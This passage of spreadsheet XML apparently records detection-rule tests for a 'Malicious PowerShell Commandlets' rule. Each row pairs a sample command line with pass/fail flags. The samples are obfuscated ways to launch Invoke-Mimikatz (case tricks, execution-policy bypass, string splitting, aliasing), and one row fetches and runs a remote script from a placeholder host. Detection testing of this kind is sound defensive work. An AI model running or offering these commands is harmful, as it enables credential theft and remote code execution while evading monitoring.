        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B794" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C794" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D794" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E794" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F794" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G794" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79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794" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K794" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B795" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C795" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D795" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E795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795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H795" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I795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95" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K795" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B796" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C796" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D796" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E796" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H796" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I796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96" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K796" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B797" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C797" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D797" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E797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797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H797" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I797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97" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K797" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B798" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C798" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D798" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E798" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H798" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J798" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K798" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B799" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C799" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D799" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E799" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H799" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I799" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J799" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K799" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B800" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C800" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D800" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E800" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F800" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G800" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H800" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I800" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J800" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K800" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B801" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C801" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D801" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E801" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F801" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G801" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H801" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J801" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K801" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B802" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C802" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D802" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E802" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H802" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J802" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K802" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B803" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C803" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D803" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E803" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H803" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I803" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J803" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K803" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B804" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C804" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D804" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E804" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F804" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G804" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H804" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I804" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J804" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K804" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B805" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C805" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D805" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E805" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H805" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J805" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K805" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B806" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C806" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D806" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E806" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F806" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G806" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H806" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J806" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K806" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B807" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C807" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D807" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E807" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F807" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G807" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H807" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J807" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K807" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B808" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C808" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D808" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E808" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F808" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G808" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H808" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J808" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K808" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B809" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C809" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D809" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E809" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H809" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I809" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J809" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K809" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B810" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C810" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D810" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E810" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F810" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G810" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H810" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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10" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K810" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B811" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C811" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D811" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E811" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G811" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H811" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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11" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K811" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B812" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C812" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D812" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E812" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G812" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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12" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K812" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B813" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C813" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D813" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E813" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G813" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81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13" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K813" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1" s="42">
      <c r="A814" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B814" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C814" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D814" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E814" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G814" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H814" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I814" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J814" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K814" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1" s="42">
      <c r="A815" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B815" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C815" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D815" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E815" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G815" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H815" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I815" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J815" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K815" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1" s="42">
      <c r="A816" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B816" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C816" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D816" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E816" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G816" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H816" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I816" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J816" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K816" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="817" ht="15.75" customHeight="1" s="42">
      <c r="A817" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B817" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C817" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D817" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E817" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F817" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G817" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H817" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I817" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J817" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K817" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="818" ht="15.75" customHeight="1" s="42">
      <c r="A818" s="36" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B818" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C818" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D818" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E818" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F818" s="36" t="b">
        <v>1</v>
      </c>
